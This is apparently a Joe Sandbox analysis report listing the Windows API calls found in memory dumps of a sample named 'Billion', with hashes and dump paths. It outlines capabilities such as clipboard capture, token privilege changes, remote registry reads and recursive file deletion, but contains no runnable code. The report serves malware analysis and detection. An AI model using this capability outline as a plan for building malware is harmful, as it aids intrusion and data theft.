                                                                                                                                                                                                                                                                                                          • Opcode ID: a68ed3e8418b620d34a63d52d905c6cf3800747759e83b0d4aecc1ab9553ac28
                                                                                                                                                                                                                                                                                                          • Instruction ID: d16780a3dfde71a70292603cc450d70eb6c9dee40f84fbb1d76bac971a2a84b1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a68ed3e8418b620d34a63d52d905c6cf3800747759e83b0d4aecc1ab9553ac28
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0D06C3200010DBBDF029F85ED06EDA3FAAFB48714F014010BE1856020C732E861AB91
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,0019D840), ref: 0019EAB1
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019DC54: FindFirstFileW.KERNEL32(?,?), ref: 0019DCCB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 0019DD1B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0019DD2C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019DC54: FindClose.KERNEL32(00000000), ref: 0019DD43
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 001A666E
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00192010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0019205A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00192010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00192087
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00192010: GetLastError.KERNEL32 ref: 00192097
                                                                                                                                                                                                                                                                                                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00191BD2
                                                                                                                                                                                                                                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00191BF4
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00191C05
                                                                                                                                                                                                                                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00191C1D
                                                                                                                                                                                                                                                                                                          • GetProcessWindowStation.USER32 ref: 00191C36
                                                                                                                                                                                                                                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 00191C40
                                                                                                                                                                                                                                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00191C5C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00191B48), ref: 00191A20
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A0B: CloseHandle.KERNEL32(?,?,00191B48), ref: 00191A35
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                                                          • String ID: $default$winsta0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00191A60
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,001914E7,?,?,?), ref: 00191A6C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001914E7,?,?,?), ref: 00191A7B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001914E7,?,?,?), ref: 00191A82
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00191A99
                                                                                                                                                                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00191518
                                                                                                                                                                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0019154C
                                                                                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00191563
                                                                                                                                                                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0019159D
                                                                                                                                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001915B9
                                                                                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 001915D0
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 001915D8
                                                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 001915DF
                                                                                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00191600
                                                                                                                                                                                                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00191607
                                                                                                                                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00191636
                                                                                                                                                                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00191658
                                                                                                                                                                                                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0019166A
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00191691
                                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00191698
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001916A1
                                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001916A8
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001916B1
                                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001916B8
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 001916C4
                                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001916CB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191ADF: GetProcessHeap.KERNEL32(00000008,001914FD,?,00000000,?,001914FD,?), ref: 00191AED
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,001914FD,?), ref: 00191AF4
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001914FD,?), ref: 00191B03
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c58ec4a6050fdb381eeaca3cb031a3d9509e9cd08241c39e45fee4e582f2975f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2b4959deb9a062c142a6d9a37771d89d738da55427ae9820e87eda1f144dcef3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c58ec4a6050fdb381eeaca3cb031a3d9509e9cd08241c39e45fee4e582f2975f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C713BB2D0020ABBDF109FA5EC44FAEBBB8BF04350F1A4525F915A7190D771D985CBA0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • OpenClipboard.USER32(001CDCD0), ref: 001AF586
                                                                                                                                                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 001AF594
                                                                                                                                                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 001AF5A0
                                                                                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 001AF5AC
                                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 001AF5E4
                                                                                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 001AF5EE
                                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 001AF619
                                                                                                                                                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 001AF626
                                                                                                                                                                                                                                                                                                          • GetClipboardData.USER32(00000001), ref: 001AF62E
                                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 001AF63F
                                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 001AF67F
                                                                                                                                                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 001AF695
                                                                                                                                                                                                                                                                                                          • GetClipboardData.USER32(0000000F), ref: 001AF6A1
                                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 001AF6B2
                                                                                                                                                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 001AF6D4
                                                                                                                                                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 001AF6F1
                                                                                                                                                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 001AF72F
                                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 001AF750
                                                                                                                                                                                                                                                                                                          • CountClipboardFormats.USER32 ref: 001AF771
                                                                                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 001AF7B6
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 420908878-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0bc4bcfca8202b1be861ad923febfa2a37d7bbc75659fa179d763bd5dce9b476
                                                                                                                                                                                                                                                                                                          • Instruction ID: 145a4a9cc5f07fa539b763a78ebaa821a84f1a3e51f0ac31416647e22c0162e3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bc4bcfca8202b1be861ad923febfa2a37d7bbc75659fa179d763bd5dce9b476
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C661C339204301AFD300EFA0E889F6ABBA4EF95704F14456DF546C76A2DB31DD86CB62
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 001A7403
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001A7457
                                                                                                                                                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001A7493
                                                                                                                                                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001A74BA
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 001A74F7
                                                                                                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 001A7524
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                                                          • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2cf46fea9fa8229ee5ae324e51df5ac48183e9beaf94ff4409e9c566bab35673
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0f68c3da8f57d45f00a276d8017f50ed60d1feb7a68cd3eb278b484f00c964e7
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cf46fea9fa8229ee5ae324e51df5ac48183e9beaf94ff4409e9c566bab35673
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63D13FB2508344AEC310EBA4CC85EBBB7ECAF99704F44491DF589D7291EB74DA44CB62
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 001AA0A8
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 001AA0E6
                                                                                                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 001AA100
                                                                                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 001AA118
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001AA123
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 001AA13F
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 001AA18F
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(001F7B94), ref: 001AA1AD
                                                                                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 001AA1B7
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001AA1C4
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001AA1D4
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                                                                                                                                          • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                                          • Opcode ID: 88f15a607ea2b7c4aaa972efcbdace23133cce9f6c70087087ce3c45da5f7e3f
                                                                                                                                                                                                                                                                                                          • Instruction ID: d9c17246f890bec929b3206df50dd78b6abcad0db4379020b6a49c526e0ce4f0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88f15a607ea2b7c4aaa972efcbdace23133cce9f6c70087087ce3c45da5f7e3f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3831F37660031DBBDB10AFB4EC49EEE77ADAF46361F5000A5F815E2090EB70DE85CA65
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001A4785
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A47B2
                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 001A47E2
                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 001A4803
                                                                                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 001A4813
                                                                                                                                                                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 001A489A
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001A48A5
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001A48B0
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                                          • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                                                          • Opcode ID: e94ad229bf685ad1b2d861b550f473a823e4f1dd3772a0196b75c38144f11fd8
                                                                                                                                                                                                                                                                                                          • Instruction ID: aa260c410226234ebd0ee0f030f734e4b9202e07c8f62c8db9f3a33e17ebe22d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e94ad229bf685ad1b2d861b550f473a823e4f1dd3772a0196b75c38144f11fd8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4131B2B6500249ABDB219FA0EC49FEB37BCFF8A701F1040B6F519D6060E7B4D6858B24
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 001AA203
                                                                                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 001AA25E
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001AA269
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 001AA285
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 001AA2D5
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(001F7B94), ref: 001AA2F3
                                                                                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 001AA2FD
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001AA30A
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001AA31A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0019E3B4
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                                                                                                                                          • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                                                          • Opcode ID: 31077f375b6049b64bb7d6c8b01f33d6d8f8338ebce388958ed3d9048e279174
• Instruction ID: 15089e93ba026ddc4010cf42586aec260e6c89bd961a497ee37cdfc944e73777
• Opcode Fuzzy Hash: 31077f375b6049b64bb7d6c8b01f33d6d8f8338ebce388958ed3d9048e279174
• Instruction Fuzzy Hash: 6E31047550021DAECF10AFB4EC09FEE77ADEF46324F5041A6E811A3090EB71DE95CA55
APIs
  • Part of subcall function 001BD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001BC10E,?,?), ref: 001BD415
  • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD451
  • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD4C8
  • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001BC99E
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 001BCA09
• RegCloseKey.ADVAPI32(00000000), ref: 001BCA2D
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 001BCA8C
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001BCB47
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 001BCBB4
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 001BCC49
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 001BCC9A
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 001BCD43
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 001BCDE2
• RegCloseKey.ADVAPI32(00000000), ref: 001BCDEF
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
• String ID:
• API String ID: 3102970594-0
• Opcode ID: f8f9b72bdf9a5eba8432189681ed9d599180018f72c007049a6e49b43a6d435a
• Instruction ID: b4c3063f06b5902757fa5ea1f68c7d67c6f81e1350128b76f3c15548cd644f86
• Opcode Fuzzy Hash: f8f9b72bdf9a5eba8432189681ed9d599180018f72c007049a6e49b43a6d435a
• Instruction Fuzzy Hash: 75025075604200AFD714DF28C895E6ABBE5FF58314F1884ADF849CB2A2DB31ED46CB91
APIs
  • Part of subcall function 00135851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001355D1,?,?,00174B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00135871
  • Part of subcall function 0019EAB0: GetFileAttributesW.KERNEL32(?,0019D840), ref: 0019EAB1
• FindFirstFileW.KERNEL32(?,?), ref: 0019D9CD
• DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0019DA88
• MoveFileW.KERNEL32(?,?), ref: 0019DA9B
• DeleteFileW.KERNEL32(?,?,?,?), ref: 0019DAB8
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0019DAE2
  • Part of subcall function 0019DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0019DAC7,?,?), ref: 0019DB5D
• FindClose.KERNEL32(00000000,?,?,?), ref: 0019DAFE
• FindClose.KERNEL32(00000000), ref: 0019DB0F
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
